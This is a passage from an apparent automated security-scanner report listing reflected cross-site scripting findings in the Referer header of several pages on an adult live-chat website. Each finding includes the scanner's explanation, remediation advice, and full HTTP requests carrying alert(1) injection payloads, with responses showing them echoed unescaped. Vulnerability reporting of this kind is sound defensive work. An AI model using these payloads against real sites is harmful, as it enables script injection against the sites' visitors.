Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=38c58'-alert(1)-'c21d7feff7f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:34 GMT
Connection: close
Content-Length: 51719
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/competitionspage.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video/&rf=http://www.google.com/search?hl=en^q=38c58'-alert(1)-'c21d7feff7f&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.217. http://imlive.com/live-sex-chats/gay-couple/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/gay-couple/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 375ba'-alert(1)-'7a67cb13099 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/gay-couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=375ba'-alert(1)-'7a67cb13099

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:05 GMT
Connection: close
Content-Length: 33567
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
pe="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay-couple/&rf=http://www.google.com/search?hl=en^q=375ba'-alert(1)-'7a67cb13099&qs=cat=1^roomid=52&qs=cat=1^roomid=52&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

2.218. http://imlive.com/live-sex-chats/gay/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/gay/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ca5e'-alert(1)-'e9dfbf1b8ea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/gay/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=2ca5e'-alert(1)-'e9dfbf1b8ea

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:34 GMT
Connection: close
Content-Length: 195039
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ript type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay/&rf=http://www.google.com/search?hl=en^q=2ca5e'-alert(1)-'e9dfbf1b8ea&qs=cat=1^roomid=53&qs=cat=1^roomid=53&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

2.219. http://imlive.com/live-sex-chats/guy-alone/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/guy-alone/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ad47'-alert(1)-'76a1a657857 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/guy-alone/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=5ad47'-alert(1)-'76a1a657857

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:48 GMT
Connection: close
Content-Length: 69840
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/guy-alone/&rf=http://www.google.com/search?hl=en^q=5ad47'-alert(1)-'76a1a657857&qs=cat=1^roomid=54&qs=cat=1^roomid=54&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

2.220. http://imlive.com/live-sex-chats/happyhour/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/happyhour/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1502'-alert(1)-'6f19a081c72 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/happyhour/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=d1502'-alert(1)-'6f19a081c72

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:43 GMT
Connection: close
Content-Length: 22380
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
pe="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/happyhour.aspx&he=imlive.com&ul=/live-sex-chats/happyhour/&rf=http://www.google.com/search?hl=en^q=d1502'-alert(1)-'6f19a081c72&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.221. http://imlive.com/live-sex-chats/lesbian-couple/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/lesbian-couple/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b461'-alert(1)-'6f4815116d3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/lesbian-couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=8b461'-alert(1)-'6f4815116d3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:22 GMT
Connection: close
Content-Length: 118812
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian-couple/&rf=http://www.google.com/search?hl=en^q=8b461'-alert(1)-'6f4815116d3&qs=cat=1^roomid=191&qs=cat=1^roomid=191&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if (
...[SNIP]...

2.222. http://imlive.com/live-sex-chats/lesbian/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/lesbian/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7026c'-alert(1)-'0aae3d52806 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/lesbian/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=7026c'-alert(1)-'0aae3d52806

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:47 GMT
Connection: close
Content-Length: 32900
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian/&rf=http://www.google.com/search?hl=en^q=7026c'-alert(1)-'0aae3d52806&qs=cat=1^roomid=11&qs=cat=1^roomid=11&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

2.223. http://imlive.com/live-sex-chats/live-sex-video/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/live-sex-video/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff204'-alert(1)-'8fd9da9f013 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/live-sex-video/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=ff204'-alert(1)-'8fd9da9f013

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
